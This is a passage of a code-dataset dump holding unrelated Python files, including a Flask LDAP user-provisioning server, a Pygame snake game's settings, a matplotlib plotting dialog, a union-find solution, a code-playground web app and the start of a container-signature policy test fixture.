header row\n        # writerows() writes several rows at once; its argument is a list of dicts\n        
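# NOTE (added): newline='' in the open() call above keeps the csv module from\n        # inserting blank lines between rows on Windows\n        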
writer.writerows(books)\n\n# Call main() when this file is executed with the python command. This is a common Python\n# idiom that keeps main() from running when the file is imported as a module by another file.\nif __name__ == '__main__':\n    main()","sub_path":"python_scraper.py","file_name":"python_scraper.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"54324862","text":"#!/usr/bin/python2.7\n\nimport os\nimport sys\nimport traceback\nimport ldap\nimport ssl\nfrom flask import Flask, send_file, send_from_directory, redirect, request, make_response\nfrom flask.ext.restful import Resource, Api\nfrom flask.ext.restful.reqparse import RequestParser\nfrom tornado.wsgi import WSGIContainer\nfrom tornado.httpserver import HTTPServer\nfrom tornado.ioloop import IOLoop\nfrom provisor import Provisor\nfrom provisor.provisor import UNKNOWN_HOST\nfrom provisor.utils import validate_pubkey as pubkey\nfrom provisor.utils import validate_username as username\n\napp = Flask(__name__)\napp.config['RESTFUL_JSON'] = {\"indent\": 4}\n\napi = Api(app)\n\np = Provisor(\n    uri=\"ldap://ldap.hashbang.sh\",\n    user=\"cn=provisor,ou=Admin,dc=hashbang,dc=sh\",\n    password=os.environ['LDAP_PASSWORD'],\n    user_base=\"ou=People,dc=hashbang,dc=sh\",\n    group_base=\"ou=Group,dc=hashbang,dc=sh\",\n    servers_base=\"ou=Servers,dc=hashbang,dc=sh\",\n)\n\ncertfile = os.path.join(os.getcwd(), \"certs/server.crt\")\nkeyfile = os.path.join(os.getcwd(), \"certs/server.key\")\nhttps_port = 4443\nhttp_port = 8080\n\n\n@api.representation('text/plain')\ndef output_plain(data, code, headers=None):\n    lines = []\n    for server, stats in data.items():\n        line = [server]\n        for key, val in stats.items():\n            line.append(str(val))\n        lines.append(\"|\".join(line))\n    data = \"\\n\".join(lines)\n    resp = make_response(data, code)\n    resp.headers.extend(headers or {})\n    return resp\n\n\nclass UserCreate(Resource):\n    def __init__(self):\n        self.reqparse = RequestParser()\n        self.reqparse.add_argument(\n            'user',\n            type = username,\n            required = True,\n            location = 'json'\n        )\n        self.reqparse.add_argument(\n            'key',\n            type = pubkey,\n            required = True,\n            location = 'json'\n        )\n        self.reqparse.add_argument(\n            'host',\n            type = str,\n            required = True,\n            location = 'json'\n        )\n        super(UserCreate, self).__init__()\n\n    def post(self):\n        args = self.reqparse.parse_args()\n        print(args)\n\n        try:\n            p.add_user(\n                username=str(args['user']),\n                pubkey=args['key'],\n                hostname=args['host']\n            )\n        except ldap.SERVER_DOWN:\n            return {'message': 'Unable to connect to LDAP server'}, 400\n        except ldap.ALREADY_EXISTS:\n            return {'message': 'User already exists'}, 400\n        except UNKNOWN_HOST:\n            return {'message': 'Unknown shell server'}, 400\n        except:\n            (typ, value, tb) = sys.exc_info()\n            sys.stderr.write(\"Unexpected Error: %s\\n\" % typ)\n            sys.stderr.write(\"\\t%s\\n\" % value)\n            traceback.print_tb(tb)\n            return {'message': 'User creation script failed'}, 400\n\n        return {'message': 'success'}\n\n\nclass ServerStats(Resource):\n    LOCATIONS = {\n        \"da1.hashbang.sh\": {\"lat\": 32.8, \"lon\": -96.8},\n        \"ny1.hashbang.sh\": {\"lat\": 40.7, \"lon\": -74},\n        \"sf1.hashbang.sh\": {\"lat\": 37.8, \"lon\": -122.4},\n        \"to1.hashbang.sh\": {\"lat\": 43.7, \"lon\": -79.4}\n    }\n\n    def get(self, out_format='json'):\n        try:\n            server_stats = p.server_stats()\n        except ldap.SERVER_DOWN:\n            return {'message': 'Unable to connect to LDAP server'}, 400\n\n        for s in server_stats.keys():\n            if s in self.LOCATIONS.keys():\n                server_stats[s]['coordinates'] = self.LOCATIONS[s]\n\n        return 
server_stats\n\n\napi.add_resource(UserCreate, '/user/create')\napi.add_resource(ServerStats, '/server/stats')\n\n\ndef security_headers(response, secure=False):\n    csp = \"default-src 'none'; \" \\\n          \"style-src https://fonts.googleapis.com 'self'; \" \\\n          \"font-src https://fonts.gstatic.com; \" \\\n          \"img-src data:; script-src 'self'; \" \\\n          \"sandbox allow-same-origin allow-scripts; \" \\\n          \"frame-ancestors 'none'\"\n\n    response.headers['Content-Security-Policy'] = csp\n    response.headers['Referrer-Policy'] = 'no-referrer'\n    response.headers['X-Content-Type-Options'] = 'nosniff'\n    response.headers['X-Frame-Options'] = 'DENY'\n    response.headers['X-XSS-Protection'] = '1; mode=block'\n\n    if secure:\n        response.headers['Strict-Transport-Security'] = 'max-age=31536000'\n\n    return response\n\n\n@app.route('/', methods=[\"GET\"])\ndef root():\n    useragent = request.headers.get('User-Agent')\n    has_https = 'https_server' in globals()\n\n    if 'curl' in useragent and not request.is_secure:\n        resp = send_from_directory('static', 'warn.sh.asc')\n    elif not has_https or request.is_secure:\n        resp = send_from_directory('static', 'index.html')\n    else:\n        return redirect(request.url.replace(\"http://\", \"https://\"))\n\n    return security_headers(resp, secure=request.is_secure)\n\n\n@app.route('/LICENSE.md', methods=['GET'])\ndef license():\n    return security_headers(send_file('LICENSE.md', mimetype='text/markdown'),\n                            secure=request.is_secure)\n\n# HE.net domain validation\n@app.route('/s73rmwh.txt', methods=['GET'])\ndef he_net():\n    return security_headers(make_response('Hello IPv6!'),\n                            secure=request.is_secure)\n\n@app.route('/assets/<path:filename>', methods=['GET'])\ndef assets(filename):\n    return security_headers(send_from_directory('src', filename),\n                            secure=request.is_secure)\n\nif __name__ == '__main__':\n\n    if os.path.isfile(certfile) and os.path.isfile(keyfile):\n        ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\n        ssl_ctx.load_cert_chain(certfile, keyfile)\n\n        # Protocol options: allow TLSv1.1 and later\n        ssl_ctx.options |= ssl.OP_NO_SSLv2\n        ssl_ctx.options |= ssl.OP_NO_SSLv3\n        ssl_ctx.options |= ssl.OP_NO_TLSv1\n\n        # Cipher options: strong ciphers, follow server preferences\n        ssl_ctx.set_ciphers(\"ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA384\")\n        ssl_ctx.options |= ssl.OP_CIPHER_SERVER_PREFERENCE\n\n        # Key exchange: strong prime curve, no point reuse\n        ssl_ctx.set_ecdh_curve('prime256v1')\n        ssl_ctx.options |= ssl.OP_SINGLE_ECDH_USE\n\n        https_server = HTTPServer(\n            WSGIContainer(app),\n            ssl_options=ssl_ctx\n        )\n        https_server.listen(https_port)\n\n    http_server = HTTPServer(WSGIContainer(app))\n    http_server.listen(http_port)\n    IOLoop.instance().start()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"611556552","text":"from typing import Any, Tuple, Union\n\nimport numpy as np\nfrom random import randint\n\nnum1 = randint(1, 10)\nnum2 = randint(1, 10)\n# assert isinstance(num2, int)\nx = int(np.lcm(num1, num2))\n\nprint(num1)\nprint(num2)\nprint(int(x))\n\nnum1 = int(input(\"Type your first no.: \"))\nnum2 = int(input(\"Type your second no.: \"))\n\nx = np.lcm(num1, num2)\nprint(x)\n","sub_path":"function_5.py","file_name":"function_5.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} 
+{"seq_id":"90057297","text":"import pygame as engine\nfrom os import path\n\n## pegar o diretorio do arquivo\nroot = path.dirname(path.abspath(__file__)) + \"\\\\\"\n\n## inicia tudo do pygame\nengine.init()\n\nengine.display.set_caption(\"Snek\")\n\n## pega informaçao do display\ngetRes = engine.display.Info()\n\nconfig = open(root+\"config.ini\", \"r\")\nfull = config.readline()\n\nflags = engine.FULLSCREEN | engine.DOUBLEBUF | engine.HWSURFACE\n\nif \"1\" in full:\n resolucao = [int(getRes.current_w), int(getRes.current_h)]\n tela = engine.display.set_mode(resolucao, flags)\n \nelse:\n resolucao = [int(getRes.current_w / 1.5), int(getRes.current_h / 1.5)]\n flags = engine.DOUBLEBUF | engine.HWSURFACE\n\n tela = engine.display.set_mode(resolucao, flags)\n\nconfig.close()\n\ntela.set_alpha(None)\n\nposCaixa = []\nfor i in range(1, 21):\n posCaixa.append((resolucao[1] / 20) * i)\n\n\ncaixaScores = []\nfor i in range(1, 19):\n caixaScores.append((resolucao[1] / 18) * i)\n\n## definindo relogio como uma variável para ficar mais fácil\nrelogio = engine.time.Clock()\n\n## o delay para repetir as teclas quando o usuario segurar elas\nengine.key.set_repeat(200, 50)\n\n\nlimiteFps = 120\n\n## define o tamanho da cobra de acordo com o display\n## nesse caso o tamanho eh 2% do tamanho do display\ntam = [int(resolucao[0] * 0.02)] * 2\n\ntamComida = tam\n\n## [0, 1] sao as posiçoes da cobra e [2, 3] eh o tamanho\nrectPlayer = [(resolucao[0] // 2) - tam[0] // 2, (resolucao[1] // 2) - tam[1] // 2, tam[0], tam[1]]\n\n## calcula a velocidade da cobra com base no tamanho do player\n## vel eh 20% do tamanho\nvel = tam[0] * 0.2\n\n# o delay q a calda vai ter\n# para pegar a posicao do player\ndelayCalda = 1\ntamInicial = 10\n\nbg = 10, 10, 10\nbranco = 255, 255, 255\nvermelho = 255, 100, 100\nverde = 0, 255, 102\nverde2 = 92, 255, 158\nverde3 = 149, 255, 192\nverde4 = 205, 255, 226\nazul = 157, 198, 255\nhighlight = 150, 150, 150\n\n## a variavel q vai definir pra onde a cobra vai se mexer\ndirecao = \"nulo\"\n\n## tipo de fonte e tamanho dela\nfonte = engine.font.Font(root+\"Font\\\\Font2.otf\", int(resolucao[0] * 0.0225))\nfonteArr = engine.font.Font(root+\"Font\\\\Font2.otf\", int(resolucao[0] * 0.026))\nfonteTitulo = engine.font.Font(root+\"Font\\\\Font2.otf\", int(resolucao[0] * 0.0565))\nultra = engine.font.Font(root+\"Font\\\\Font2.otf\", int(resolucao[0] * 0.07))\n\n## fazer um texto predefinido para renderizar depois\nrestart = fonte.render(\"R = Reset\", True, branco)\n\n## posição do texto de restart\nposRestart = (resolucao[0] / 2) - restart.get_size()[0] / 2, resolucao[1] - restart.get_size()[1]\n\n\nsair = fonte.render(\"ESC = Menu\", True, branco)\n\nposSair = (resolucao[0] / 2 - sair.get_size()[0] / 2, posRestart[1] - sair.get_size()[1])\n\n\nultra = ultra.render(\"Ultra Snake\", True, branco)\n\n## pra resetar o jogo se o usuario\n## apertar R\nreset = True\n\n## pra informar que o jogo acabou\nfim = True\n\nupload = False\n","sub_path":"Defaults.py","file_name":"Defaults.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"458828242","text":"from torchvision import transforms, datasets\n\nfrom base import BaseDataLoader\n\n\nclass Cifar10DataLoader(BaseDataLoader):\n\n def __init__(self, data_dir, batch_size, shuffle=True, validation_split=0.0, num_workers=1, training=True,\n img_size=32):\n trsfm = transforms.Compose([\n transforms.Resize(img_size),\n transforms.ToTensor(),\n 
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n )\n self.data_dir = data_dir\n self.dataset = datasets.CIFAR10(self.data_dir, train=training, download=True, transform=trsfm)\n super().__init__(self.dataset, batch_size, shuffle, validation_split, num_workers)\n","sub_path":"data_loader/cifar100_data_loader.py","file_name":"cifar100_data_loader.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"246671923","text":"for _ in range (int(input())):\n person=int(input())\n arr=list(map(int,input().split()))\n end=arr[0]\n start=1\n sum=arr[0]\n person-=1\n day=0\n while person>0:\n for i in range(start,end):\n sum+=arr[i]\n start=end\n end=sum\n person-=sum\n day+=1\n print(day)","sub_path":"spread the word.py","file_name":"spread the word.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"413753558","text":"import math\n\nfrom PySide import QtCore, QtGui\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.backend_bases import key_press_handler\n\nclass MyFigure(Figure, QtCore.QThread):\n def __init__(self, parent, *args, **kwargs):\n QtCore.QThread.__init__(self, parent)\n Figure.__init__(self, *args, **kwargs)\n\n self.plot_data = list()\n self.figures = list()\n\n def start_plotting_thread(self, plot_data, on_finish=None):\n \"\"\" Start plotting \"\"\"\n self.plot_data = plot_data\n if len(self.figures) == 0:\n self.setup_subplot()\n \n\n\n if on_finish is not None:\n self.finished.connect(on_finish)\n\n self.start()\n\n def setup_subplot(self):\n \"\"\" Run as a thread \"\"\"\n # Figure out rows and columns\n total_plots = len(self.plot_data)\n\n columns = int(math.sqrt(total_plots))\n if columns < 1:\n columns = 1\n\n rows = int(total_plots / columns)\n if (total_plots % columns) > 0:\n rows += 1\n if rows < 1:\n rows = 1\n\n # Plot Data\n for plot_index, _plot_data in enumerate(self.plot_data):\n plot_number = plot_index + 1\n args = (rows, columns, plot_number)\n kwargs = {\n 'title': _plot_data['title'],\n 'xlabel': _plot_data['xlabel'],\n 'ylabel': _plot_data['ylabel']\n }\n\n figure = self.add_subplot(*args, **kwargs)\n\n figure.plot(_plot_data['x'], _plot_data['y'], '.b')\n\n self.figures.append(figure)\n\n self.subplots_adjust(hspace=0.5, wspace=0.4) \n\n def run(self):\n for i, pd in enumerate(self.plot_data):\n self.figures[i].plot(pd['x'], pd['y'], '.b')\n\n\n\nclass PlotDialog(QtGui.QDialog):\n def __init__(self, parent):\n \n QtGui.QDialog.__init__(self, parent, QtCore.Qt.WindowMinMaxButtonsHint | QtCore.Qt.WindowCloseButtonHint)\n\n self.figure = MyFigure(self)\n self.canvas = FigureCanvas(self.figure)\n self.toolbar = NavigationToolbar(self.canvas, self)\n\n self.layout = QtGui.QGridLayout()\n self.setLayout(self.layout)\n\n layout = [\n [self.toolbar],\n [self.canvas], \n ]\n\n for row_index, columns in enumerate(layout):\n if type(columns) is list:\n for column_index, widget in enumerate(columns):\n if widget is not None:\n self.layout.addWidget(widget, row_index, column_index)\n\n self.canvas.mpl_connect('key_press_event', lambda event:key_press_handler(event, self.canvas, self.toolbar))\n\n def draw_plots(self, plot_data):\n \"\"\" Plot Plots \"\"\"\n self.figure.start_plotting_thread(plot_data, 
on_finish=self.finish_drawing_plots)\n\n    def finish_drawing_plots(self):\n        \"\"\" Finish drawing plots \"\"\"\n        self.canvas.draw()\n        self.show()\n\nimport sys\nif __name__ == \"__main__\":\n    qApp = QtGui.QApplication(sys.argv)\n    w = QtGui.QWidget()\n    p = PlotDialog(w)\n    p.draw_plots([{'title': 'Port 0',\n                   'xlabel': 't(s)',\n                   'ylabel': 'Pressure(Pa)',\n                   'x' : [1,2],\n                   'y' : [1,2]},\n                  {'title': 'Port 1',\n                   'xlabel': 't(s)',\n                   'ylabel': 'Pressure(Pa)',\n                   'x' : [1,2],\n                   'y' : [1,2]},\n                  {'title': 'Port 2',\n                   'xlabel': 't(s)',\n                   'ylabel': 'Pressure(Pa)',\n                   'x' : [1,2],\n                   'y' : [1,2]},\n                  {'title': 'Port 3',\n                   'xlabel': 't(s)',\n                   'ylabel': 'Pressure(Pa)',\n                   'x' : [1,2],\n                   'y' : [1,2]},\n                  {'title': 'Port 0',\n                   'xlabel': 't(s)',\n                   'ylabel': 'Pressure(Pa)',\n                   'x' : [1,2],\n                   'y' : [1,2]},\n                  ])\n    w.setWindowTitle('Scanner...')\n    sys.exit(qApp.exec_())\n\n    \n","sub_path":"more_plot.py","file_name":"more_plot.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198136910","text":"import wx\nfrom Components.SettingsHelpers import *\n\nclass OverviewValsPanel(wx.Panel):\n    def __init__(self,parent, stats, streamname):\n        super(OverviewValsPanel, self).__init__(parent)\n\n        self.tablewidth = 360\n\n        sb = wx.StaticBox(self, label=streamname)\n        sbs = wx.StaticBoxSizer(sb, orient=wx.VERTICAL) \n        self.list = wx.ListCtrl(self, -1, style=wx.LC_REPORT,size=(self.tablewidth+30,100))\n        self.list.InsertColumn(0,\"Stat\");\n        self.list.SetColumnWidth(0,self.tablewidth/2)\n        self.list.InsertColumn(1,\"Value\");\n        self.list.SetColumnWidth(1,self.tablewidth/2)\n        \n\n        idCounter = 0\n\n        for k,v in stats.items():\n            self.list.InsertStringItem(idCounter, k)\n            self.list.SetStringItem(idCounter, 1, str(v))\n            idCounter+=1\n\n        sbs.Add(self.list,flag=wx.EXPAND)\n        self.SetSizer(sbs)\n\n\n\n\n\n","sub_path":"Vicarious/Vicarious/Application/Components/Dialogs/OverviewValsPanel.py","file_name":"OverviewValsPanel.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"45232022","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 22 15:26:15 2020\n\n@author: Mathew\n\"\"\"\nfname =''\ndata = {}\nf = open(fname, 'r')\nlines = f.readlines()\nf.close()\n\n\nfor line in lines:\n    cs = line.split(',')\n    data[cs[0]] = cs[1:]","sub_path":"csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"498045140","text":"import typing\nimport pyecore.ecore as Ecore\nfrom functools import lru_cache, wraps\nfrom pyecore.notification import EObserver\n\n\nclass ResultObserver(EObserver):\n    def notifyChanged(self, notif):\n        print(notif)\n\n\nclass EObjectProxy(object):\n    def __init__(self, instance):\n        object.__setattr__(self, 'wrapped', instance)\n        object.__setattr__(self, 'wrapped_eClass', instance.eClass)\n\n    def __getattribute__(self, name):\n        wrapped = 
object.__getattribute__(self, 'wrapped')\n        eClass = object.__getattribute__(self, 'wrapped_eClass')\n        result = getattr(wrapped, name)\n        if eClass.findEStructuralFeature(name):\n            print('access', name, ':', result, 'for', wrapped)\n        return result\n\n    def __setattr__(self, name, value):\n        wrapped = object.__getattribute__(self, 'wrapped')\n        if isinstance(value, EObjectProxy):\n            value = object.__getattribute__(value, 'wrapped')\n        return setattr(wrapped, name, value)\n\n    def __str__(self):\n        wrapped = object.__getattribute__(self, 'wrapped')\n        return wrapped.__str__()\n\n\ndef mapping(f):\n    f.__mapping__ = True\n    result_var_name = 'result'\n    f.self_eclass = typing.get_type_hints(f).get('self')\n    if f.self_eclass is None:\n        raise ValueError(\"Missing 'self' parameter for mapping: '{}'\"\n                         .format(f.__name__))\n    f.result_eclass = typing.get_type_hints(f).get('return')\n\n    @wraps(f)\n    def inner(*args, **kwargs):\n        if f.result_eclass is None:\n            index = f.__code__.co_varnames.index('self')\n            result = kwargs.get('self', args[index])\n        elif f.result_eclass is Ecore.EClass:\n            result = f.result_eclass('TMP')\n        else:\n            result = f.result_eclass()\n        inputs = [a for a in args if isinstance(a, Ecore.EObject)]\n        print('CREATE', result, 'FROM', inputs, 'BY', f.__name__)\n        g = f.__globals__\n        marker = object()\n        oldvalue = g.get(result_var_name, marker)\n        g[result_var_name] = result\n        observer = ResultObserver(notifier=result)\n        new_args = [EObjectProxy(obj)\n                    if isinstance(obj, Ecore.EObject)\n                    else obj\n                    for obj in args]\n        for key, value in kwargs:\n            if isinstance(value, Ecore.EObject):\n                kwargs[key] = EObjectProxy(obj)\n        try:\n            f(*new_args, **kwargs)\n        finally:\n            if oldvalue is marker:\n                del g[result_var_name]\n            else:\n                g[result_var_name] = oldvalue\n            result.listeners.remove(observer)\n        return result\n    return lru_cache()(inner)\n\n\nclass when(object):\n    def __init__(self, condition):\n        self.condition = condition\n\n    def __call__(self, f):\n        @wraps(f)\n        def inner(*args, **kwargs):\n            if self.condition(*args, **kwargs):\n                return f(*args, **kwargs)\n        return inner\n\n\nclass disjunct(object):\n    def __init__(self, *args):\n        self.list = args\n\n    def __call__(self, f):\n        @wraps(f)\n        def inner(*args, **kwargs):\n            for fun in self.list:\n                result = fun(*args, **kwargs)\n                if result is not None:\n                    break\n            f(*args, **kwargs)\n            return result\n        return inner\n\n\nclass mapping_when(object):\n    def __init__(self, condition):\n        self.condition = condition\n\n    def __call__(self, f):\n        @wraps(f)\n        @when(self.condition)\n        @mapping\n        def inner(*args, **kwargs):\n            return f(*args, **kwargs)\n        return inner\n","sub_path":"experimental/m2m/m2mlib.py","file_name":"m2mlib.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"12819400","text":"from django.urls import path, include\nfrom .views import DepartamentoList,\\\n    DepartamentoCreate, DepartamentoUpdate, \\\n    DepartamentoDelete\n\nurlpatterns = [\n\n    path('list/', DepartamentoList.as_view(), name='list_departamentos'),\n    path('create/', DepartamentoCreate.as_view(), name='create_departamentos'),\n    path('update/<int:pk>/', DepartamentoUpdate.as_view(), name='update_departamentos'),\n    path('delete/<int:pk>/', DepartamentoDelete.as_view(), name='delete_departamentos'),\n\n\n]","sub_path":"apps/departamentos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"255214264","text":"#!/usr/bin/python3\n#Author:pliu\n\n# class Solution:\n#     def findCircleNum(self, M):\n#         p = [i for i in range(len(M))]\n#         def find(x):\n#             if p[x] != x:\n#                 p[x] = find(p[x])\n#             return p[x]\n#\n#         for i in range(len(M)):\n#             for j in range(len(M)):\n#                 if M[i][j] == 1:\n#                     a = find(i) ## this is the merge step; writing a separate function felt like too much hassle\n#                     b = find(j)\n#                     p[a] = b ## update the root node directly in the array\n#\n#         for i in range(len(M)): ## this extra pass is needed so every node points at its root before counting how many distinct roots there are\n#             find(i)\n#         return len(set(p))\n# class Solution:\n#     def findCircleNum(self, M):\n#         N = 
len(M)\n#         count = 0\n#         visited = set()\n#\n#         def dfs(i):\n#             for j in range(N):\n#                 if M[i][j] and j not in visited:\n#                     visited.add(j)\n#                     dfs(j)\n#\n#         for i in range(N):\n#             if i not in visited:\n#                 count += 1\n#                 visited.add(i)\n#                 dfs(i)\n#\n#         return count\nclass Solution:\n    def findCircleNum(self, M):\n        f = {}\n        s = {}\n        count = len(M)\n\n        def find(x):\n            f.setdefault(x, x)\n            # path compression\n            if x != f[x]:\n                f[x] = find(f[x])\n            return f[x]\n\n        def union(x, y):\n            nonlocal count\n            x_father, y_father = find(x), find(y)\n            if x_father == y_father: return\n            # attach the root of the smaller tree to the root of the larger tree\n            if s.setdefault(x_father, 1) < s.setdefault(y_father, 1):\n                f[x_father] = y_father\n                s[y_father] += s[x_father]\n            else:\n                f[y_father] = x_father\n                s[x_father] += s[y_father]\n            count -= 1\n\n        for i in range(len(M)):\n            for j in range(i + 1, len(M)):\n                if M[i][j] == 1:\n                    union(i, j)\n        return count\n\n\nif __name__ == '__main__':\n    M= [[1,1,0],[1,1,0],[0,0,1]]\n    print(Solution().findCircleNum(M))","sub_path":"Week07/朋友圈.py","file_name":"朋友圈.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"368456927","text":"from flask import Flask, render_template, request, abort\nfrom app import app, db\nfrom models import CodePlayGround\nfrom hashids import Hashids\n\nhashids = Hashids(salt=app.config['HASH_SALT'])\n\n@app.route('/')\n@app.route('/index')\ndef index():\n\treturn render_template('home/index.html')\n\n@app.route('/run', methods=['GET','POST'])\ndef run():\n\tif request.method == 'GET':\n\t\treturn render_template('run/nocode.message.html')\n\telse:\n\t\thtml = request.form['html']\n\t\tcss = request.form['css']\n\t\tjs = request.form['js']\n\n\t\tcode = {\n\t\t\t'html':html,\n\t\t\t'css':css,\n\t\t\t'js':js\n\t\t}\n\n\t\treturn render_template('run/preview.html', code=code)\n\n@app.route('/save', methods=['POST'])\ndef save():\n\thtml = request.form['html']\n\tcss = request.form['css']\n\tjs = request.form['js']\n\n\tcpg = CodePlayGround(html=html, css=css, js=js)\n\n\tdb.session.add(cpg)\n\tdb.session.commit()\n\n\tid = cpg.id\n\n\treturn hashids.encode(id)\n\n@app.route('/update', methods=['PUT'])\ndef update():\n\treturn ''\n\n@app.route('/fork', methods=['POST'])\ndef fork():\n\treturn ''\n\n@app.route('/cpg/<hashed_id>')\n@app.route('/<hashed_id>')\ndef get_playground(hashed_id):\n\tid = hashids.decode(hashed_id)\n\n\tcpg = CodePlayGround.query.get(id)\n\n\tif cpg:\n\t\tcode = {\n\t\t\t'html': cpg.html,\n\t\t\t'css': cpg.css,\n\t\t\t'js': cpg.js\n\t\t}\n\t\n\t\treturn render_template('home/index.html', code=code)\n\telse:\n\t\tabort(404)\n\n@app.errorhandler(404)\ndef page_not_found(error=None):\n\tmessage = {\n\t\t'status' : 404,\n\t\t'text' : 'Not Found: ' + request.url\n\t}\n\n#\tif request.is_xhr:\n\t\t\n#\telse:\n\treturn render_template('error.html', message=message)","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"40744084","text":"\"\"\"Mulholland setup module\"\"\"\n\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\n# Always prefer setuptools over distutils\nfrom setuptools import find_packages, setup\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n    long_description = f.read()\n\nsetup(\n    name='mulholland',\n    version='0.0.1',\n    description='Automatic Video Library 
Manager for TV Shows',\n long_description=long_description,\n\n # The project's main homepage.\n url='https://github.com/Alzakath/mulholland',\n\n # Author details\n author='Alzakath',\n author_email='herve.coatanhay@gmail.com',\n\n # Choose your license\n license='MIT',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: End Users/Desktop',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.5',\n ],\n\n # What does your project relate to?\n keywords='video tv shows',\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n install_requires=['gevent', 'pyzmq', 'webob'],\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # pip to create the appropriate form of executable for the target platform.\n entry_points={\n 'console_scripts': [\n 'mulholland=mulholland:main'\n ],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"328931419","text":"import pytest\nfrom . import conftest as fix\nimport connaisseur.config as co\nimport connaisseur.exceptions as exc\nimport connaisseur.validators as vals\nfrom connaisseur.image import Image\n\n\n@pytest.fixture(autouse=True)\ndef mock_config_path(monkeypatch):\n def m_safe_path_func(callback: callable, base_dir: str, path: str, *args, **kwargs):\n return callback(path, *args, **kwargs)\n\n monkeypatch.setattr(co, \"safe_path_func\", m_safe_path_func)\n\n co.Config._Config__PATH = \"tests/data/config/sample_config.yaml\"\n co.Config._Config__SECRETS_PATH = \"tests/data/config/sample_secrets.yaml\"\n co.Config._Config__EXTERNAL_PATH = \"tests/data/config/\"\n co.Config._Config__SCHEMA_PATH = \"connaisseur/res/config_schema.json\"\n\n\nnv1 = vals.notaryv1.notaryv1_validator.NotaryV1Validator\nstatic = vals.static.static_validator.StaticValidator\ncosign = vals.cosign.cosign_validator.CosignValidator\nstatic_config = {\n \"validators\": [\n {\n \"name\": \"default\",\n \"type\": nv1,\n },\n {\n \"name\": \"harbor\",\n \"type\": nv1,\n },\n {\"name\": \"allow\", \"type\": static},\n {\"name\": \"deny\", \"type\": static},\n {\"name\": \"cosign-example\", \"type\": cosign},\n {\"name\": \"ext\", \"type\": nv1},\n ],\n \"policy\": [\n {\"pattern\": \"*:*\", \"with\": {\"delegations\": [\"phbelitz\", \"chamsen\"]}},\n {\n \"pattern\": \"docker.io/*:*\",\n \"validator\": \"dockerhub\",\n \"with\": {\"delegations\": [\"phbelitz\"]},\n },\n {\"pattern\": \"k8s.gcr.io/*:*\", \"validator\": \"allow\"},\n {\"pattern\": \"gcr.io/*:*\", \"validator\": \"allow\"},\n {\n \"pattern\": \"docker.io/securesystemsengineering/*:*\",\n \"validator\": \"dockerhub\",\n \"with\": {\"delegations\": [\"someuserthatdidnotsign\"]},\n },\n {\n \"pattern\": \"docker.io/securesystemsengineering/sample\",\n \"validator\": \"dockerhub\",\n \"with\": {\"delegations\": [\"phbelitz\", \"chamsen\"]},\n },\n {\n \"pattern\": \"docker.io/securesystemsengineering/sample:v4\",\n \"validator\": \"allow\",\n },\n {\n \"pattern\": \"docker.io/securesystemsengineering/connaisseur:*\",\n \"validator\": \"allow\",\n },\n {\n \"pattern\": \"docker.io/securesystemsengineering/sample-san-sama\",\n \"validator\": \"allow\",\n },\n {\n \"pattern\": \"docker.io/securesystemsengineering/alice-image\",\n \"validator\": 
